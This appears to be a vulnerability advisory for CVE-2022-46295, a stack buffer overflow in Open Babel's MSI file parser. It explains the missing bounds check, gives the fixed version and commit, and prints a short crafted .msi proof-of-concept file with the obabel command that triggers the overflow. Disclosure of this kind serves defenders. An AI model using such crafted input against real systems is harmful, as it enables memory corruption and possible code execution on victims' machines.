high · 7.8CVE-2022-46295Jul 1, 2026

CVE-2022-46295: Open Babel MSI Parser Stack Buffer Overflow

Rohit Hatagale
AI Security Researcher, SecureLayer7

A crafted MSI chemistry file can overflow a fixed-size stack array in Open Babel's MSI parser, letting an attacker write arbitrary data past the end of the buffer and potentially execute code.

Packageopenbabel
Ecosystempip
Affected< 3.2.0
Fixed in3.2.0

The problem

Open Babel's MSI format reader in `msiformat.cpp` declares a fixed-size `translationVectors[]` array on the stack to hold unit-cell lattice vectors. The `ReadMolecule` loop reads lines after a `PeriodicType` keyword and writes a new vector entry for every line containing exactly 6 whitespace-separated tokens.

The loop has no upper-bound guard on `numTranslationVectors`. Supplying more than the array's capacity causes writes past the end of the stack buffer. Because the x, y, z values come directly from parsed tokens, the out-of-bounds write is attacker-controlled, making arbitrary code execution feasible (CVSS 7.8).

Proof of concept

A working proof-of-concept for CVE-2022-46295 in openbabel, with the exact payload below.

text
# Minimal crafted .msi file that overflows translationVectors[]
# Feed to: obabel -i msi evil.msi -o sdf
# Each "A1" block after PeriodicType has 6 tokens -> one vector written.
# More than 3 such blocks overflow the fixed stack array.

(1 Model
 (2 PeriodicType
  (A I OrderParameter 3)
 )
 (3 Lattice3D
  (A D A3 (1.0 0.0 0.0 0.0 1.0 0.0))
  (A D A3 (0.0 0.0 1.0 1.0 0.0 0.0))
  (A D A3 (0.0 1.0 0.0 0.0 0.0 1.0))
  (A D A3 (9.9 9.9 9.9 9.9 9.9 9.9))
  (A D A3 (8.8 8.8 8.8 8.8 8.8 8.8))
  (A D A3 (7.7 7.7 7.7 7.7 7.7 7.7))
 )
)

The vulnerable while loop in `MSIFormat::ReadMolecule` (msiformat.cpp) entered a branch on detecting `"PeriodicType"`, then read subsequent lines and called `translationVectors[numTranslationVectors++].Set(x, y, z)` for every line with 6 tokens, with no check that `numTranslationVectors` was within the array bounds.

Because `Set()` writes three `double` values (24 bytes) per call, each extra iteration advances 24 bytes past the end of a stack-allocated array, overwriting adjacent stack frames with attacker-supplied floating-point values. The patch (commit 40e85213) adds a bounds check so the loop exits as soon as `numTranslationVectors` reaches the array size, stopping further writes.

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains commit 40e852138f21d586b7ccdce6329e7b23a87168bb. That commit adds an explicit upper-bound guard on `numTranslationVectors` before each write into `translationVectors[]`. No workaround is available for older versions; avoid parsing untrusted MSI files with any version below 3.2.0.

Reported by Cisco Talos.

References: [1][2][3][4][5][6]

Related research